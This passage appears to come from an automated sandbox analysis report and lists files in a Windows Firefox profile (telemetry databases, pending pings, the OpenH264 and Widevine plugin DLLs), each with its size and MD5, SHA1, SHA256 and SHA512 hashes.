SHA512495f186a3fe70adeaf9779159b0382c33bf0d41fe3fe825a93249e9e3495a7603b0dd8f64ca664ea476a6bafd604425bf215b90b340a1558abe2bf23119e5195
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin
Filesize7KB
MD55ef991f28604b718bbf67af11bd117ed
SHA11393b9d6c1550c1152054e6468c673f1fb3cb0b2
SHA256991783765e25b914a8472ada51a8a9944280e26a135591e72d0441ff898f91bd
SHA5125e45f1ba7fbfaf0b6e72a5ffcd9de1bb5e04133a2ae59ae7fd9b64c8da17a3b453083c1cba37f7380c6f2e6eca1c35e73db55ff2835c749652974bdc60336279
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin
Filesize13KB
MD50890069d6d4a0b77e1c98c730724cbc9
SHA1ce9a00539393279477158939b3a015c452740b18
SHA256369e7e4c48f4d0f3a391b42880c346efc9eaf415e92b587ece712caa17762162
SHA5128c317bf0ca72e51288c730833055b99989bc601be04ec4d5fdfe161c21614315c4d2f3b6ac52a5ea6dbc22d1d51446f3ed827442dde3aa8a111909d8bbf0dfa5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5aa3684b63cd55bae870ea626c8d4bff0
SHA17637b694762f4a5cb717753cfe9bfd411fe67fa3
SHA256ff9143f2b454ee97d7416d7565fa300d334f59bf54d3a5e38b7e8927900bee51
SHA5128788980b1fc217bed571e04ab1c86a23505590bc9623f359f92e3ee78a86d2b3144f5d297e7081a156566182a2bb0d1b9fcec11869fc24030d8f88b964747c88
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD509bf65473a9c77c543669d1d930e0123
SHA1a29b29d4f227b58c9a619857c35909fc7f71df5e
SHA256109f086177ac777b853b00c3b17d1f3515730599e6c587988c80f4c9632d7a04
SHA512563f243d751d49e79d6a885be6b65170a991f99c328cec89a6b5da1c5759230dc0f88b3611e3bc5121394de906a0d219e9b9be40b4630a85af0df407a5252b10
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD544861fd516cc4042423540dbea31d67c
SHA1f46740836eaa539c6f42a210fe3298d0c259c240
SHA2569a64861b852e0899b12aa5276d0c7d7b988804737d169330b7a0417050575762
SHA5120fc76d9df75ee5b6a2c3ef84b7b4a34444442a6b1308a05daec73a3f863dc419d5ef7bf4948e033e227c0f5b21c3336199e7850e998094e727e82c24fd635c6e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD51b8d62df54ba7a4a5b159e287bae8274
SHA1438a89a6f8342f9df0c6e73a960c8b51dbed2b17
SHA256940acf2d9078b584f56ef24df4374ada1539875c2a633beb33716e8ef5b1815b
SHA512323556829e289af20bc41235268437b9f92790ad4433fc587de4ba5afa34ea9a4f60cf877381dad0a0c4d9babe7db9bd455f960cdb0a5b12c07d3d6287228d14
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\ac0731c7-52ab-4d2b-9e23-210f2acb5d10
Filesize671B
MD50634790ac9ff147ca6d48717ffd15178
SHA1c0a30ac8f5a3d60f7df3646db4e068f79478b6a7
SHA2560ea4df03289f188f7cd1b58adf5924b4c0858972636e1a0103683bbf0a3af525
SHA512f929244d271c65d0d532a4fab1c7b74ceaf003a1068079500875812ab4bfdf5b6a64d9167cef38fcddf58d4f0e9c3ecff722d57739aee87b31400c81c8780a23
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\d8c17f47-06ba-4f0f-8436-b51b365a1881
Filesize27KB
MD562b7a7ff20343ed858890c7181fc93c7
SHA1ec4a86a1225ec2005d01ce32fca1f5af72d496f2
SHA256e0616ac57a102eea5cbc7530336978b94be567e1ae0cb67379710e1351cca9b3
SHA51260f2dd8987de3238a73ae56af79466217f4613ed6ad5ffdb029729bdc886de81ed4295b7b96b908f6d7062d210ebd24ee21a37bea2c834949dff1d04d6919113
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\dd1c1d65-205b-4ab0-aaab-e473e8e89b79
Filesize982B
MD5a9fe9b67d3c7f3fe2fb380c8460aed78
SHA123e9b37e0ba70e47f6d22e90082ae13d1e118f6a
SHA256b6670f7e8a3b2712d85447b198a0c6da51c75a81a28394f55cedd0b76a02dbcc
SHA5125590c608848ae2c99f8c00aa949fe3e84687a09e49f7d10d83b436642c5beb01c1e87d220b374bf8d4f1b2005445d03d66f8fd23abe79a66021ff4d46d041545
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD5060d055a8bb60ecb3ce867f6a80b8d53
SHA15775e5f601be983970e4a8c3bbebea6a69f834d9
SHA256e64275d4915c2f241823a7971567367fd6513001915b6a5aa5536824e340dde1
SHA512dd8a6020207e6f3722ea9c90202c2dd2063a7ed5a7514ffdb426f33b50c36ffcd271e734d8eb0f5464a6ae2bf8533581210bb9e50b441f911932bda3ca5668d2
-
Filesize
15KB
MD5bfcff185e03e9a0bf22b6e42c2441c96
SHA10e7ea5bd5c0d78bf8b59847f78f37adab33b44dd
SHA2560f8008fb585d47ff167e5d86319ad4d94560beb14a6f27fd2ee4050f99263d68
SHA5125c54212a363a93bf2e5031b3db2a9fc04a3b31a05838974f7f1ffb36966d793e3848ed748e64892c1281ebc6f2d17df13c5dc01169220ea4e0591354fe0103f2
-
Filesize
9KB
MD59ccee690d31dac51ef938003b78f8d45
SHA1967dffa33878f149e6a41ff3b419b59ddbc29c99
SHA2562f6c2d14a27742ab2e188a3bd682d3598175e6f54d8305b97a87aaed4c0f5c0e
SHA5120f36bf67e7e87e8fd1fccf386256bd4c607c9c895d9df929bc82431001cc1d6c607b0f078fccdcaaed7b137e2d30391e9fc52a4eed1ef5414395732117f2fe94
-
Filesize
9KB
MD51d38292638508fa28985f48a3c9e4ba9
SHA1626ad9bcc605b75fe14424c7660b4d855c95bb5c
SHA256e40ce32060cef7f1904fe3d76d658e2ea6e62b674f54a2fde9a313fcf1e38599
SHA512731e56e954f510ced68420229c22ce60298145015129726e6c8f3c8cff9e49ffa68c8c8d1ea44d52866d7a192151013d4db520e12e60d2de9cdb71d091614433
-
Filesize
360KB
MD5645a45d81803813ec953409b49468e69
SHA10bc8a903ac1e5e2c84baa37edbc9a8b08227b35b
SHA2562678ff9e7de004631e19523d40153b6c04c7a88732ca15e283b0f970adcb18ef
SHA5121e85dc511cb6d8b3dba96821f2ab0dfb1bbc0c09d935516746ffb1ed6cae6c791438dd98a28f3d0ca102af96a594e1b5a9b2c729d0c6923271012d15dda21145